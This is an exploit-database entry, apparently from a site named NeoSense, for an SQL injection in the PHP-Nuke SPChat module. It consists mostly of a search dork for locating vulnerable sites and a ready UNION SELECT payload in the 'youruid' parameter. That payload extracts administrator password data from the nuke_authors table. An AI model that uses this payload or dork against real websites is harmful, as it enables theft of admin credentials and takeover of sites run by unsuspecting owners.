[] NeoSense
E X P L O I T S
title author type platform port cve id

PHP-Nuke module (SPChat) - SQL Injection

Author: Yakir Wizman
type: webapps
platform: php
port: 
date_added: 2012-07-20 
date_updated: 2012-07-20 
verified: 0 
codes: OSVDB-84394 
tags: 
aliases:  
screenshot_url:  
application_url: 
## Owner : Pr0T3cT10n
## Script site : http://www.phpnuke.org
## Script name : PHP-Nuke module(SPChat)
## Version : All
## Type : SQL Injection
## D0rk : inurl:name=SPChat

## Description :
    ## Pull out user details from the database

## Vuln :
    ## http://www.example.com/modules.php?op=modload&name=SPChat&file=chooser&youruid=[SQL Injection]
    ## http://www.example.com/modules.php?op=modload&name=SPChat&file=chooser&youruid=0+UNION+SELECT+pwd,2,3,4,5,6,7,8+FROM+nuke_authors+LIMIT+0,1

## NOTE :
    ## You need to be a regular user
Billing Policy . Cookies Policy . Conditions . Disclaimer . ICANN Policy . Legal Notice . Privacy Policy . Spam Policy . Usage Policy
Copyright © 2026 NEOSENSE. All rights reserved.